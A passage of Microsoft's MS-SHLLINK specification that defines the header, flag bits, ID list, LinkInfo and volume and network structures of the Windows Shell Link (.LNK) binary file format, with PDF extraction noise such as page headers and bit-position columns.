system, for example a database or the regi stry, or embedded in another file format. For more 
information, see [MSDN -ISHELLLINK] . 
Multi-byte data values in the Shell Link Binary File Format are stored in little -endian  format.  
1.4   Relationship to Protocols and Other Structures  
The Shell Link Binary File Format is used by the Compound File Binary File Format [MS-CFB]. 
The Shell Link Binary File Format uses the Property Store Binary File Format [MS-PROPSTORE] . 
 
7 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  1.5   Applicability Statement  
This document specifies a persistence format for links  to files in a file system or to applications that 
are available for installation. This persistence format is applicable for use as a stand -alone file and 
for containment within other structures.  
1.6   Versioning and Localization  
This specification covers versioning issues in the following areas:  
Localization : The Shell Link Binary File Format defines the ConsoleFEDataBlock  structure (section 
2.5.2), which specifies a code page  for displaying text. That value can be used to specify a set of 
characters for a particular language or locale.  
1.7   Vendor -Extensible Fields  
A shell data source  can extend the persistence format by storing custom data inside ItemID  
structure.  
The ItemIDs embedded in an IDList  are in a format specified by the shell data sources that manage 
the ItemIDs. The ItemIDs are free to store whatever data is needed in this structure to uniquely 
identify the items in their namespace . 
The property store embedded in a l ink can be used to store property values in the shell link.  
 
8 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  2   Structures  
The Shell Link Binary File Format consists of a sequence of structures that conform to the following 
ABNF  rules [RFC5234] . 
 
SHELL_LINK = SHELL_LINK_HEADER [LINKTARGET_IDLIST] [LINKINFO]  
             [STRING_DATA] *EXTRA_DATA  
 
SHELL_LINK_HEADER : A ShellLinkHeader  structure (section 2.1), which contains identification 
information, timestamps, and flags that specify the presence of optional structures.  
LINKTARGET_IDLIST : An optional LinkTargetIDList  structure (section 2.2), which specifies the 
target of the link. The presence of this structure is specified by the HasLinkTargetIDList  bit 
(LinkFlags  section 2.1.1) in the ShellLinkHead er. 
LINKINFO : An optional LinkInfo  structure (section 2.3), which specifies information necessary to 
resolve the link target. The presence of this structu re is specified by the HasLinkInfo  bit (LinkFlags 
section 2.1.1) in the ShellLinkHeader.  
STRING_DATA : Zero or more optional StringData  structures (section 2.4), which are used to 
convey user interface and path identification information. The presence of these structures is 
specified by bits (LinkFlags section 2.1.1) in the ShellLinkHeader.  
EXTRA_DATA : Zero or more ExtraData  structures (section 2.5). 
2.1   ShellLinkHeader  
The ShellLinkHeader structure contains identification information, timestamps, and flags that specify 
the presence of optional structures, including LinkTargetIDList (section 2.2), LinkInfo (section 2.3), 
and StringData (section 2.4). 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
HeaderSize  
LinkCLSID  
... 
... 
... 
LinkFlags  
FileAttributes  
 
9 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  CreationTime  
... 
AccessTime  
... 
WriteTime  
... 
FileSize  
IconIndex  
ShowCommand  
HotKey  Reserved1  
Reserved2  
Reserved3  
HeaderSize (4 bytes):  The size, in bytes, of this structure. This value MUST be 0x0000004C.  
LinkCLSID (16 bytes):  A class identifier (CLSID) . This value MUST be 00021401 -0000-
0000-C000-000000000046.  
LinkFlags (4 bytes):  A LinkFlags  structure (section 2.1.1 ) that specifies information about the 
shell link and the presence of optional portions of the structure.  
FileAttributes (4  bytes):  A FileAttributesFlags  structure (section 2.1.2) that specifies 
information about the link target.  
CreationTime (8 bytes):  A FILETIME  structure ( [MS-DTYP]  section 2.3.1) that specifies the 
creation time of the link target in UTC (Coordinated Universal Time) . If the value is zero, 
there is no creation time set on the link targ et. 
AccessTime (8 bytes):  A FILETIME  structure ( [MS-DTYP]  section 2.3.1) that specifies the 
access time of the link target in UTC (Coordinated Universal Time) . If the value is zero, 
there is no access time set on the link targe t. 
WriteTime (8 bytes):  A FILETIME  structure ( [MS-DTYP]  section 2.3.1) that specifies the write 
time of the link target in UTC (Coordinated Universal Time) . If the value is zero, there is 
no write time set on the link target.  
 
10 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  FileSize (4 bytes):  A 32-bit unsigned integer that specifies the size, in bytes, of the link target. 
If the link target file is larger than 0xFFFFFFFF, this value specifies the least significant 32 bits 
of the link target file size.  
IconIndex (4 bytes):  A 32-bit signed integer that specifies the index of an icon within a given 
icon location.  
ShowCommand (4 bytes):  A 32-bit unsigned integer that specifies the expected window state 
of an application launched by the link. This value SHOULD be one of the fol lowing.  
Value  Meaning  
SW_SHOWNORMAL  
0x00000001  The application is open and its window is open in a normal fashion.  
SW_SHOWMAXIMIZED  
0x00000003  The application is open, and keyboard focus is given to the application, 
but its window is not shown.  
SW_SHOWM INNOACTIVE  
0x00000007  The application is open, but its window is not shown. It is not given the 
keyboard focus.  
All other values MUST be treated as SW_SHOWNORMAL . 
HotKey (2 bytes):  A HotKeyFlags  structure (section 2.1.3 ) that specifies the keystrokes used 
to launch the application referenced by the shortcut key. This value is assigned to the 
application after it is launched, so that pressing the key activates that application.  
Reserved1 (2 bytes):  A value that MUST be zero.  
Reserved2 (4 bytes):  A value that MUST be zero.  
Reserved3 (4 bytes):  A value that MUST be zero.  
2.1.1   LinkFlags  
The LinkFlags structure defines bits that specify which shell link structures are present in the file 
format after the ShellLinkHeader  structure (section 2.1). 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
A B C D E F G H I J K L M N O P Q R S T U V W X Y Z A 
A 0 0 0 0 0 
Where the bits are defined as:  
Value  Description  
A 
HasLinkTargetIDList  The shell link is saved with an item ID list (IDList). If this bit is set, 
a LinkTargetIDList  structure (section 2.2) MUST follow the 
ShellLinkHeader.  
B 
HasLinkInfo  The shell link is saved with link information. If this bit is set, a 
LinkInfo  structure (section 2.3) MUST be present.  
 
11 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Description  
C 
HasName  The shell link is saved with a name string. If this bit is set, a 
NAME_STRING  StringData  structure (section 2.4) MUST be 
present.  
D 
HasRelativePath  The shell link is saved with a relative path string. If this bit is set, 
a RELATIVE_PATH  StringData structure (section 2.4) MUST be 
present.  
E 
HasWorkingDir  The shell link is saved with a working directory string. If this bit is 
set, a WORKING_DIR  StringData structure (section 2.4) MUST 
be present.  
F 
HasArguments  The shell link is saved with command line argu ments. If this bit is 
set, a COMMAND_LINE_ARGUMENTS  StringData structure 
(section 2.4) MUST be present.  
G 
HasIconLocation  The shell link is saved with an icon location string. If this bit is set, 
an ICON_ LOCATION  StringData structure (section 2.4) MUST be 
present.  
H 
IsUnicode  The shell link contains Unicode encoded strings. This bit SHOULD 
be set.  
I 
ForceNoLinkInfo  The LinkInfo structure (section 2.3) is ignored.  
J 
HasExpString  The shell link is saved with an EnvironmentVariableDataBlock 
(section 2.5.4). 
K 
RunInSeparateProcess  The target is run in a separate virtual machine when launching a 
link target that is a 16 -bit application.  
L 
Unused1  A bit that is undefined and MUST be ignored.  
M 
HasDarwinID  The shell link is saved with a DarwinDataBlock (section 2.5.3). 
N 
RunAsUser  The application is run as a different user when the target of the 
shell link is activated.  
O 
HasExpIcon  The shell link is saved with an IconEnvironmentDataBlock (section 
2.5.5 ). 
P 
NoPidlAlias  The file system location is represented in the shell namespace 
when the path to an item is parsed into an IDList.  
Q 
Unused2  A bit that is undefined and MUST be ignored.  
R 
RunWithShimLayer  The shell link is saved with a ShimDataBlock (section 2.5.8). 
S The TrackerDataBlock (section 2.5.10 ) is ignored.  
 
12 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Description  
ForceNoLinkTrack  
T 
EnableTargetMetadata  The shell link attempts to collect target properties and store them 
in the PropertyStoreDataBlock (section 2.5.7) when the link target 
is set. 
U 
DisableLinkPathTracking  The EnvironmentVariableDataBlock is ignored.  
V 
DisableKnownFolderTracking  The SpecialFolderDataBlock (section 2.5.9) and the 
KnownFolderDataBlock (section 2.5.6) are ign ored when loading 
the shell link. If this bit is set, these extra data blocks SHOULD 
NOT be saved when saving the shell link.  
W 
DisableKnownFolderAlias  If the link has a KnownFolderDataBlock (section 2.5.6), the 
unaliased form of the known folder IDList S HOULD be used when 
translating the target IDList at the time that the link is loaded.  
X 
AllowLinkToLink  Creating a link that references another link is enabled. Otherwise, 
specifying a link as the target IDList SHOULD NOT be allowed.  
Y 
UnaliasOnSave  When  saving a link for which the target IDList is under a known 
folder, either the unaliased form of that known folder or the target 
IDList SHOULD be used.  
Z 
PreferEnvironmentPath  The target IDList SHOULD NOT be stored; instead, the path 
specified in the EnvironmentVariableDataBlock (section 2.5.4) 
SHOULD be used to refer to the target.  
AA 
KeepLocalIDListForUNCTarget  When the target is a UNC name that re fers to a location on a local 
machine, the local path IDList in the PropertyStoreDataBlock 
(section 2.5.7) SHOULD be stored, so it can be used when the link 
is loaded on the local machine.  
2.1.2   FileAttributesFlags  
The FileAttributesFlags structure defines bits that specify the file attributes of the link target , if the 
target is a file system item. File attributes can be used if the link target is not available, or if 
accessing the target would be inefficient. It is possible for the target items attributes to be out of 
sync with this value.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
A B C D E F G H I J K L M N O 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
Where the bits are defined as:  
Value  Description  
A 
FILE_ATTRIBUTE_READONLY  The file or directory is read -only. For a file, if this bit 
is set, applications can read the file but cannot write 
to it or delete it. For a directory, if this bit is set, 
 
13 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Description  
applications cannot delete the directory.  
B 
FILE_ATTRIBUTE_HIDDEN  The file or dire ctory is hidden. If this bit is set, the 
file or folder is not included in an ordinary directory 
listing.  
C 
FILE_ATTRIBUTE_SYSTEM  The file or directory is part of the operating system 
or is used exclusively by the operating system.  
D 
Reserved1  A bit that  MUST be zero.  
E 
FILE_ATTRIBUTE_DIRECTORY  The link target is a directory instead of a file.  
F 
FILE_ATTRIBUTE_ARCHIVE  The file or directory is an archive file. Applications 
use this flag to mark files for backup or removal.  
G 
Reserved2  A bit that MUST be zero.  
H 
FILE_ATTRIBUTE_NORMAL  The file or directory has no other flags set. If this bit 
is 1, all other bits in this structure MUST be clear.  
I 
FILE_ATTRIBUTE_TEMPORARY  The file is being used for temporary storage.  
J 
FILE_ATTRIBUTE_SP ARSE_FILE  The file is a sparse file.  
K 
FILE_ATTRIBUTE_REPARSE_POINT  The file or directory has an associated reparse point.  
L 
FILE_ATTRIBUTE_COMPRESSED  The file or directory is compressed. For a file, this 
means that all data in the file is compressed. For a 
directory, this means that compression is the default 
for newly created files and subdirectories.  
M 
FILE_ATTRIBUTE_OFFLINE  The data of the file is n ot immediately available.  
N 
FILE_ATTRIBUTE_NOT_CONTENT_INDEXED  The contents of the file need to be indexed.  
O 
FILE_ATTRIBUTE_ENCRYPTED  The file or directory is encrypted. For a file, this 
means that all data in the file is encrypted. For a 
directory, thi s means that encryption is the default 
for newly created files and subdirectories.  
2.1.3   HotKeyFlags  
The HotKeyFlags structure specifies input generated by a combination of keyboard keys being 
pressed.  
 
14 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
LowByte  HighByte  
LowByte (1 byte):  An 8-bit unsigned integer that specifies a virtual key code that corresponds 
to a key on the keyboard. This value MUST be one of the following:  
Value  Meaning  
0x30 "0" key  
0x31 "1" key  
0x32 "2" key  
0x33 "3" key  
0x34 "4" key  
0x35 "5" key  
0x36 "6" key  
0x37 "7" key  
0x38 "8" key  
0x39 "9" key  
0x41 "A" key  
0x42 "B" key  
0x43 "C" key  
0x44 "D" key  
0x45 "E" key  
0x46 "F" key  
0x47 "G" key  
0x48 "H" key  
0x49 "I" key  
0x4A "J" key  
0x4B "K" key  
0x4C "L" key  
0x4D "M" key  
 
15 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Meaning  
0x4E "N" key  
0x4F "O" key  
0x50 "P" key  
0x51 "Q" key  
0x52 "R" key  
0x53 "S" key  
0x54 "T" key  
0x55 "U" key  
0x56 "V" key  
0x57 "W" key  
0x58 "X" key  
0x59 "Y" key  
0x5A "Z" key  
VK_F1  
0x70 "F1" key  
VK_F2  
0x71 "F2" key  
VK_F3  
0x72 "F3" key  
VK_F4  
0x73 "F4" key  
VK_F5  
0x74 "F5" key  
VK_F6  
0x75 "F6" key  
VK_F7  
0x76 "F7" key  
VK_F8  
0x77 "F8" key  
VK_F9  
0x78 "F9" key  
VK_F10  
0x79 "F10" key  
VK_F11  "F11" key  
 
16 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Meaning  
0x7A 
VK_F12  
0x7B "F12" key  
VK_F13  
0x7C "F13" key  
VK_F14  
0x7D "F14" key  
VK_F15  
0x7E "F15" key  
VK_F16  
0x7F "F16" key  
VK_F17  
0x80 "F17" key  
VK_F18  
0x81 "F18" key  
VK_F19  
0x82 "F19" key  
VK_F20  
0x83 "F20" key  
VK_F21  
0x84 "F21" key  
VK_F22  
0x85 "F22" key  
VK_F23  
0x86 "F23" key  
VK_F24  
0x87 "F24" key  
VK_NUMLOCK  
0x90 "NUM LOCK" key  
VK_SCROLL  
0x91 "SCROLL LOCK" key  
HighByte (1 byte):  An 8-bit unsigned integer that specifies bits that correspond to modifier 
keys on the keyboard. This value MUST be one or a combination of the following:  
Value  Meaning  
HOTKEYF_SHIFT  
0x01 The "SHIFT" key on the keyboard.  
HOTKEYF_CONTROL  The "CTRL" key on the keyboard.  
 
17 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Value  Meaning  
0x02 
HOTKEYF_ALT  
0x04 The "ALT" key on the keyboard.  
2.2   LinkTargetIDList  
The LinkTargetIDList structure specifies the target of the link. The presence of this optional structure 
is specified by the HasLinkTargetIDList  bit (LinkFlags  section 2.1.1) in the ShellLinkHeader 
(section 2.1). 
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
IDListSize  IDList (variable)  
... 
IDListSize (2 bytes):  The size, in bytes, of the IDList  field. 
IDList (variable):  A stored IDList  structure (section 2.2.1), which contains the item ID list. An 
IDList structure conforms to the following ABNF [RFC5234] : 
 
IDLIST = *ITEMID TERMINALID  
 
2.2.1   IDList  
The stored IDList structure specifies the format of a persisted item ID list.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
ItemIDList (variable)  
... 
TerminalID  
ItemIDList (variable):  An array of zero or more ItemID  structures (section 2.2.2 ). 
TerminalID (2 bytes):  A 16-bit, unsigned integer that indicates the e nd of the item IDs. This 
value MUST be zero.  
 
18 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  2.2.2   ItemID  
An ItemID is an element in an IDList  structure (section 2.2.1). The data stored in a given ItemID is 
defined by the source that corresponds to the location in the target namespace of the preceding 
ItemIDs. This data uniquely identifies the items in that part of the namespace.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
ItemIDSize  Data (variable)  
... 
ItemIDSize (2 bytes):  A 16-bit, unsigned integer that specifies the size, in bytes, of the 
ItemID structure, including the ItemIDSize  field. 
Data (variable):  The shell data source -defined data that specifies an item.  
2.3   LinkInfo  
The LinkInfo structure specifies information necessary to resolve a link target if it is not found in its 
original location. This includes information about the volume that the target was stored on, the 
mapped drive letter, and a Universal Naming Convention (UNC) form of the path if one existed when 
the link was created. For more details about UNC paths, see [MS-DFSNM]  section 2.2.1.4.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
LinkInfoSize  
LinkInfoHeaderSize  
LinkInfoFlags  
VolumeIDOffset  
LocalBasePathOffset  
CommonNetworkRelativeLinkOffset  
CommonPathSuffixOffset  
LocalBasePathOffsetUnicode (optional)  
CommonPathSuffixOffsetUnicode (optional)  
 
19 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  VolumeID (variable)  
... 
LocalBasePath (variable)  
... 
CommonNetworkRelativeLink (variable)  
... 
CommonPathSuffix (variable)  
... 
LocalBasePathUnicode (variable)  
... 
CommonPathSuffixUnicode (variable)  
... 
LinkInfoSize (4 bytes):  A 32-bit, unsigned integer that specifies the size, in bytes, of the 
LinkInfo structure. All offsets specified in this structure MUST be less than this value, and all 
strings contained in this structure MUST fit within the extent defined by this size.  
LinkInfoHeaderSize (4 bytes):  A 32-bit, unsigned integer that specifies the size, in bytes, of 
the LinkInfo header section, which includes all specified offsets. This value MUST be defined as 
shown in the following table, and it MUST be less than LinkInfoSize .<1> 
Value  Meaning  
0x0000001C  Offsets to the optional fields are not specified.  
0x00000024 ≤ value   Offsets to the optional fields are specified.  
LinkInfoFlags (4 bytes):  Flags that specify whether the VolumeID , LocalBasePath , 
LocalBasePathUnicode , and CommonNetworkRelativeLink  fields are present in this 
structure.  
 
20 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010   
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
A B 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
Where the bits are defined as:  
Value  Description  
A 
VolumeIDAndLocalBasePath  If set, the VolumeID  and LocalBasePath  fields are 
present, and their locations are specified by the 
values of the VolumeIDOffset  and 
LocalBasePathOffset  fields, respectively. If the 
value of the LinkInfoHeaderSize  field is greater 
than or equal to 0x00000024, the 
LocalBasePathUnicode  field is present, and its 
location is specified by the value of the 
LocalBasePathOffsetUnicode  field. 
If not set, the Volum eID, LocalBasePath , and 
LocalBasePathUnicode  fields are not present, and 
the values of the VolumeIDOffset  and 
LocalBasePathOffset  fields are zero. If the value of 
the LinkInfoHeaderSize  field is greater than or 
equal to 0x00000024, the value of the 
LocalBa sePathOffsetUnicode  field is zero.  
B 
CommonNetworkRelativeLinkAndPathSuffix  If set, the CommonNetworkRelativeLink  field is 
present, and its location is specified by the value of 
the CommonNetworkRelativeLinkOffset  field. 
If not set, the CommonNetworkRelat iveLink  field 
is not present, and the value of the 
CommonNetworkRelativeLinkOffset  field is zero.  
VolumeIDOffset (4 bytes):  A 32-bit, unsigned integer that specifies the location of the 
VolumeID  field. If the VolumeIDAndLocalBasePath  flag is set, this va lue is an offset, in 
bytes, from the start of the LinkInfo structure; otherwise, this value MUST be zero.  
LocalBasePathOffset (4 bytes):  A 32-bit, unsigned integer that specifies the location of the 
LocalBasePath  field. If the VolumeIDAndLocalBasePath  flag is set, this value is an offset, 
in bytes, from the start of the LinkInfo structure; otherwise, this value MUST be zero.  
CommonNetworkRelativeLinkOffset (4 bytes):  A 32-bit, unsigned integer that specifies the 
location of the CommonNetworkRelativeLink  field. If the 
CommonNetworkRelativeLinkAndPathSuffix  flag is set, this value is an offset, in bytes, 
from the start of the LinkInfo structure; otherwise, this value MUST be zero.  
CommonPathSuffixOffset (4 bytes):  A 32-bit, unsigned integer that specifies t he location of 
the CommonPathSuffix  field. This value is an offset, in bytes, from the start of the LinkInfo 
structure.  
LocalBasePathOffsetUnicode (4 bytes):  An optional, 32 -bit, unsigned integer that specifies 
the location of the LocalBasePathUnicode  field. If the VolumeIDAndLocalBasePath  flag is 
set, this value is an offset, in bytes, from the start of the LinkInfo structure; otherwise, this 
 
21 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  value MUST be zero. This field can be present only if the value of the LinkInfoHeaderSize  
field is greater than or  equal to 0x00000024.  
CommonPathSuffixOffsetUnicode (4 bytes):  An optional, 32 -bit, unsigned integer that 
specifies the location of the CommonPathSuffixUnicode  field. This value is an offset, in 
bytes, from the start of the LinkInfo structure. This field can be present only if the value of the 
LinkInfoHeaderSize  field is greater than or equal to 0x00000024.  
VolumeID (variable):  An optional VolumeID  structure (section 2.3.1) that specifies 
information about the volume that the link target was on when the link was created. This field 
is present if the VolumeIDAndLocalBasePath  flag is set.  
LocalBasePath (variable):  An opti onal, NULL –terminated string, defined by the system default 
code page, which is used to construct the full path to the link item or link target by appending 
the string in the CommonPathSuffix  field. This field is present if the 
VolumeIDAndLocalBasePath  flag is set.  
CommonNetworkRelativeLink (variable):  An optional CommonNetworkRelativeLink  structure 
(section 2.3.2 ) that specifies information about the netw ork location where the link target is 
stored.  
CommonPathSuffix (variable):  A NULL –terminated string, defined by the system default code 
page, which is used to construct the full path to the link item or link target by being appended 
to the string in the LocalBasePath  field. 
LocalBasePathUnicode (variable):  An optional, NULL –terminated, Unicode  string that is 
used to construct the full path to the link item or link target by appending the string in the 
CommonPathSuffixUnicode  field. This field can be present only if the 
VolumeIDAndLocalBasePath  flag is set and the value of the LinkInfoHeaderSize  field is 
greater than or equal to 0x00000024.  
CommonPathSuffixUnicode (variable):  An optional, NULL –terminated, Unicode string that is 
used to construct the full path to the link item or link target by being appended to the string in 
the LocalBasePathUnicode  field. This field can be present only if the value of the 
LinkInfoHeaderSize  field is greater than or equal to 0x00000024.  
2.3.1   VolumeID  
The VolumeID structure specifies information about the volume that a link target was on when the 
link was created. This information is useful for resolving the link if the file is not found in its original 
location.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
VolumeIDSize  
DriveType  
DriveSerialNumber  
VolumeLabelOffset  
 
22 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  VolumeLabelOffsetUnicode (optional)  
Data (variable)  
... 
VolumeIDSize (4 bytes):  A 32-bit, unsigned integer that specifies the size, in bytes, of this 
structure. This value MUST be greater than 0x00000010. All offsets specified in this structure 
MUST be less than this value, and all strings contained in this structure MUST fit within t he 
extent defined by this size.  
 
 
DriveType (4 bytes):  A 32-bit, unsigned integer that specifies the type of drive the link target 
is stored on. This value MUST be one of the following:  
Value  Meaning  
DRIVE_UNKNOWN  
0x00000000  The drive type cannot be determined.  
DRIVE_NO_ROOT_DIR  
0x00000001  The root path is invalid; for example, there is no volume mounted at the 
path. 
DRIVE_REMOVABLE  
0x00000002  The drive has removable media, such as a floppy drive, thumb drive, or 
flash card reader.  
DRIVE_FIXED  
0x00000003  The drive has fixed media, such as a hard drive or flash drive.  
DRIVE_REMOTE  
0x00000004  The drive is a remote (network) drive.  
DRIVE_CDROM  
0x00000005  The drive is a CD -ROM drive.  
DRIVE_RAMDISK  
0x00000006  The drive is a RAM disk.  
DriveSerialNumber (4 bytes):  A 32-bit, unsigned integer that specifies the drive serial 
number of the volume the link target is stored on.  
VolumeLabelOffset (4 bytes):  A 32-bit, unsigned integer that specifies the location of a string 
that contains the volume label of the drive that the link target is stored on. This value is an 
offset, in bytes, from the start of the VolumeID structure to a  NULL-terminated string of 
characters, defined by the system default code page. The volume label string is located in the 
Data field of this structure.  
If the value of this field is 0x00000014, it MUST be ignored, and the value of the 
VolumeLabelOffsetUnic ode field MUST be used to locate the volume label string.  
VolumeLabelOffsetUnicode (4 bytes):  An optional, 32 -bit, unsigned integer that specifies the 
location of a string that contains the volume label of the drive that the link target is stored on. 
 
23 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  This value is an offset, in bytes, from the start of the VolumeID structure to a NULL -
terminated string of Unicode characters. The volume label string is located in the Data field of 
this structure.  
If the value of the VolumeLabelOffset  field is not 0x00000014 , this field MUST be ignored, 
and the value of the VolumeLabelOffset  field MUST be used to locate the volume label 
string.  
Data (variable):  A buffer of data that contains the volume label of the drive as a string defined 
by the system default code page or  Unicode characters, as specified by preceding fields.  
2.3.2   CommonNetworkRelativeLink  
The CommonNetworkRelativeLink structure specifies information about the network location where a 
link target is stored, including the mapped drive letter and the UNC path prefix. For details on UNC 
paths, see [MS-DFSNM]  section 2.2.1.4.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
CommonNetworkRelativeLinkSize  
CommonNetworkRelativeLinkFlags  
NetNameOffset  
DeviceNameOffset  
NetworkProviderType  
NetNameOffsetUnicode (optional)  
DeviceNameOffsetUnicode (optional)  
NetName (variable)  
... 
DeviceName (variable)  
... 
NetNameUnicode (variable)  
... 
 
24 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  DeviceNameUnicode (variable)  
... 
CommonNetworkRelativeLinkSize (4 bytes):  A 32-bit, unsigned integer that specifies the 
size, in bytes, of the CommonNetworkRelativeLink structure. This value MUST be greater than 
or equal to 0x00000014. All offsets specified in this structure MUST be less than this value, 
and all strings containe d in this structure MUST fit within the extent defined by this size.  
 
 
CommonNetworkRelativeLinkFlags (4 bytes):  Flags that specify the contents of the 
DeviceNameOffset  and NetProviderType  fields.  
 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 1 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 2 
0  
1  
2  
3  
4  
5  
6  
7  
8  
9 3 
0  
1 
A B 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
Where the bits are defined as:  
Value  Description  
A 
ValidDevice  If set, the DeviceNameOffset  field contains an offset to the device name.  
If not set, the DeviceNameOffset  field does not contain an offset to the device 
name, and its value MUST be zero.  
B 
ValidNetType  If set, the NetProviderType  field contains the network provider type.  
If not set, the NetProviderType  field does not contain t he network provider type, 
and its value MUST be zero.  
NetNameOffset (4 bytes):  A 32-bit, unsigned integer that specifies the location of the 
NetName  field. This value is an offset, in bytes, from the start of the 
CommonNetworkRelativeLink structure.  
DeviceNameOffset (4 bytes):  A 32-bit, unsigned integer that specifies the location of the 
DeviceName  field. If the ValidDevice  flag is set, this value is an offset, in bytes, from the 
start of the CommonNetworkRelativeLink structure; otherwise, this value MUS T be zero.  
NetworkProviderType (4 bytes):  A 32-bit, unsigned integer that specifies the type of network 
provider. If the ValidNetType  flag is set, this value MUST be one of the following; otherwise, 
this value MUST be ignored.  
Vendor name  Value  
WNNC_NET_AVID  0x001A0000  
WNNC_NET_DOCUSPACE  0x001B0000  
WNNC_NET_MANGOSOFT  0x001C0000  
 
25 / 52 
[MS-SHLLINK] — v20100601   
 Shell Link (.LNK) Binary File Format  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Tuesday, June 1, 2010  Vendor name  Value  
WNNC_NET_SERNET  0x001D0000  
WNNC_NET_RIVERFRONT1  0X001E0000  
WNNC_NET_RIVERFRONT2  0x001F0000  
WNNC_NET_DECORB  0x00200000  
WNNC_NET_PROTSTOR  0x00210000  
WNNC_NET_FJ_REDIR  0x00220000  
WNNC_NET_DISTINCT  0x00230000  
WNNC_NET_TWINS  0x00240000  
WNNC_NET_RDR2SAMPLE  0x00250000  
WNNC_NET_CSC  0x00260000  
WNNC_NET_3IN1  0x00270000  
WNNC_NET_EXTENDNET  0x00290000  
WNNC_NET_STAC  0x002A0000  
